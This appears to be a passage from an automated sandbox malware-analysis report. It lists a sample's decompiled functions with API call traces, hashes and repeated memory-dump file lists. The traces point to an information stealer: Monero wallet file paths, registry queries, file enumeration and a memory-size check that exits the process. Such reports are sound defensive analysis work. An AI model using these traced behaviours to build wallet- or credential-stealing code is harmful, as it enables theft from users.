Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
Instruction ID: 374a7525219daaa603970d033f96fe29f3dace69886ff5ff1bd48f848da10ecb
Opcode Fuzzy Hash: 590a49903bd483b56ab03ef9d38fdc4d8ffcb869a4c5b39fe70d937b2f4c0aae
Instruction Fuzzy Hash: 3031E2B4A00209EFDF14CF94C885BEE77BAFF48350F208159E911A7290D779AA41CFA1

Function 006A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0135E338), ref: 006A47DB

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A4801
lstrcat.KERNEL32(?,?), ref: 006A4820
lstrcat.KERNEL32(?,?), ref: 006A4834
lstrcat.KERNEL32(?,0134B6D0), ref: 006A4847
lstrcat.KERNEL32(?,?), ref: 006A485B
lstrcat.KERNEL32(?,0135DC80), ref: 006A486F

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F

Part of subcall function 006A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
Part of subcall function 006A4570: RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
Part of subcall function 006A4570: wsprintfA.USER32 ref: 006A45A6
Part of subcall function 006A4570: FindFirstFileA.KERNEL32(?,?), ref: 006A45BD

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 3cc3ece8f4017ba3d5c2527665ef2ccd5450f50ef5e5ca8e7534746f9025e93d
Instruction ID: 3d280ff7fd9180266fe08f2ed242d1c97ce89f9ac49564f189284b726d08dbf8
Opcode Fuzzy Hash: 3cc3ece8f4017ba3d5c2527665ef2ccd5450f50ef5e5ca8e7534746f9025e93d
Instruction Fuzzy Hash: 17317FB2D00208ABCB54FBB0DC85EEA737DBB49700F40459DB71996091EE749B89CF99

Function 00691220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
__aulldiv.LIBCMT ref: 00691258
__aulldiv.LIBCMT ref: 00691266
ExitProcess.KERNEL32 ref: 00691294

Strings

@, xrefs: 00691233

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
Instruction ID: b120ba5b8a706af356c51775edc29c15c781579392118eff118098a875adc99c
Opcode Fuzzy Hash: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
Instruction Fuzzy Hash: 930162B0D40308BBDF10EBD4CC49B9EBB7DAB05701F308149E705BA6C0D7745A818B59

Function 006A70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

memset.MSVCRT ref: 006A716A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006A718C
sj, xrefs: 006A72AE, 006A7179, 006A717C
sj, xrefs: 006A7111

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: sj$sj$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-1829183765
Opcode ID: c691903d7e3d8d78d3e0fc9b7d6304b7c749d42483df149be5fd70b1fc92beb5
Instruction ID: 890a0ad01465f89ba43bea34c8e1c9d741256e3cce1e227aec3689edcef0d884
Opcode Fuzzy Hash: c691903d7e3d8d78d3e0fc9b7d6304b7c749d42483df149be5fd70b1fc92beb5
Instruction Fuzzy Hash: 165190B0D042089FDB64FB90DC45BEEB3B6AF55304F1441ADE21567281EB346E88CF59

Function 006A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
RtlAllocateHeap.NTDLL(00000000), ref: 006A7E3E
RegOpenKeyExA.KERNEL32(80000002,0134C010,00000000,00020119,?), ref: 006A7E5E
RegQueryValueExA.KERNEL32(?,0135DC60,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
RegCloseKey.ADVAPI32(?), ref: 006A7E92

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
Instruction ID: 40f2f7a19c7dc83b332553058dcd6db32e47d608c3aae60f407752f8016afc94
Opcode Fuzzy Hash: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
Instruction Fuzzy Hash: 8E115EB1A44205EBDB04DF94DD49FBBBBB9FB44B10F20425AFA06A7280D7745D018FA1

Function 006912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 006912D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
RegCloseKey.ADVAPI32(?), ref: 006912FF

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
Instruction ID: 38206bee60847987519ae06821527ca9d1d05efb49c410b999a8d359844ede43
Opcode Fuzzy Hash: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
Instruction Fuzzy Hash: E501E1B9A40208BBDB04DFE4DC49FAEB7BCFB48701F10825AFE1597280D6759A419F51

Function 0069A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(013591C8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0069A0BD
LoadLibraryA.KERNEL32(0135DD80), ref: 0069A146

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

SetEnvironmentVariableA.KERNEL32(013591C8,00000000,00000000,?,006B12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,006B0AFE), ref: 0069A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0069A0B2, 0069A0C6, 0069A0DC

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: fa9fc9fa3d5c9df6bb9fbb4c62a1e506927304d9fd2d9ea9dfcc0a00994b6246
Instruction ID: fd83b96be6aabe684d5fef3f9e3a921d3c8cdc8c062a22c8c754c506c0ecb41b
Opcode Fuzzy Hash: fa9fc9fa3d5c9df6bb9fbb4c62a1e506927304d9fd2d9ea9dfcc0a00994b6246
Instruction Fuzzy Hash: D64141B1912104EFCB48EFA4FC45BAA37BABB19301F28021EF505936A1DB34D944CB57

Function 0069A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

